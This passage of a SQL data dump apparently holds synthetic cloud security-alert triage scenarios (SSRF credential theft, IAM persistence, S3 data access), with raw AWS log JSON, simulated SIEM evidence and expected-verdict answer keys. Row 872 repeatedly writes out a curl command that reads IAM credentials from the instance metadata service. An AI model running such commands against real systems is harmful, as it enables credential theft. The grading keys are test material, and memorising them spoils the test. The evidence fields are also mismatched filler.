4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(872, 'Execution of Unauthorized Commands', 'high', 'AWS CloudWatch Logs', 'An attacker exploited an SSRF vulnerability to execute unauthorized commands on the server, retrieving sensitive metadata, including IAM role credentials. The commands were executed from an external IP address, potentially indicating a breach.', 'Command Execution', 'T1059.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"source_ip\":\"203.0.113.42\",\"destination_ip\":\"10.0.1.15\",\"user\":\"ec2-user\",\"command\":\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\",\"response_code\":200,\"response_size\":512,\"user_agent\":\"curl/7.64.1\",\"session_id\":\"abcd1234efgh5678\",\"malicious_file\":\"ssrf_exploit.exe\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-15 00:53:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous SSRF attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known SSRF exploit tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl 
http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(873, 'Persistence via IAM Role Abuse', 'critical', 'IAM Role Access Logs', 'The attacker leveraged stolen IAM role credentials to establish persistent access without detection. This step involved using the compromised credentials to create a new IAM policy allowing further persistence.', 'Credential Access', 'T1078.004 - Valid Accounts: Cloud Accounts', 1, 'resolved', NULL, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAEXAMPLE:attacker-session\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\",\"accountId\":\"123456789012\",\"accessKeyId\":\"ASIAEXAMPLE\"},\"eventTime\":\"2023-09-15T14:56:30Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreatePolicy\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"198.51.100.23\",\"userAgent\":\"aws-cli/2.0.30 Python/3.7.3 Linux/5.4.0-1029\",\"requestParameters\":{\"policyName\":\"PersistencePolicy\",\"policyDocument\":{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Action\":\"s3:ListBucket\",\"Resource\":\"arn:aws:s3:::example_bucket\"}]}},\"responseElements\":{\"policy\":{\"policyName\":\"PersistencePolicy\",\"policyId\":\"ANPAEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:policy/PersistencePolicy\",\"path\":\"/\",\"defaultVersionId\":\"v1\"}},\"requestID\":\"EXAMPLE-1111-2222-3333-4444\",\"eventID\":\"EXAMPLE-5678-9101-1121-3141\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"managementEvent\":true,\"recipientAccountId\":\"123456789012\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"attacker-session\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal 
Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Session name used in multiple unauthorized activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"PersistencePolicy\",\"is_critical\":false,\"osint_result\":{\"source\":\"Policy Audit\",\"verdict\":\"suspicious\",\"details\":\"Recently created policy with permissions allowing persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 
Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 
Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 
Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 
Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 
Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(874, 'Lateral Movement to Sensitive Data Stores', 'critical', 'S3 Access Logs', 'The attacker moved laterally within the AWS environment, accessing multiple S3 buckets containing sensitive credit application data. The attacker used compromised credentials to authenticate from a known malicious IP address, targeting the S3 buckets with sensitive data.', 'Lateral Movement', 'T1080', 1, 'resolved', NULL, '{\"eventVersion\":\"1.08\",\"eventSource\":\"s3.amazonaws.com\",\"awsRegion\":\"us-west-2\",\"eventTime\":\"2023-10-05T14:48:00Z\",\"eventName\":\"GetObject\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:user/compromised_user\",\"accountId\":\"123456789012\",\"userName\":\"compromised_user\"},\"requestParameters\":{\"bucketName\":\"credit-applications\",\"key\":\"sensitive_data/credit_2023.csv\"},\"sourceIPAddress\":\"203.0.113.45\",\"userAgent\":\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\",\"responseElements\":{\"x-amz-request-id\":\"1A2B3C4D5E6F7G8H\",\"x-amz-id-2\":\"EXAMPLEBASE64STRING=\"},\"additionalEventData\":{\"bytesTransferredIn\":0,\"bytesTransferredOut\":2048,\"x-amz-id-2\":\"EXAMPLEBASE64STRING==\",\"x-amz-request-id\":\"1A2B3C4D5E6F7G8H\"},\"requestID\":\"1A2B3C4D5E6F7G8H\",\"eventID\":\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\",\"readOnly\":true,\"resources\":[{\"type\":\"AWS::S3::Object\",\"ARN\":\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious 
activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IAM user account compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credit_2023.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Data Classification\",\"verdict\":\"internal\",\"details\":\"File contains sensitive credit application data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws 
OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws 
OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws 
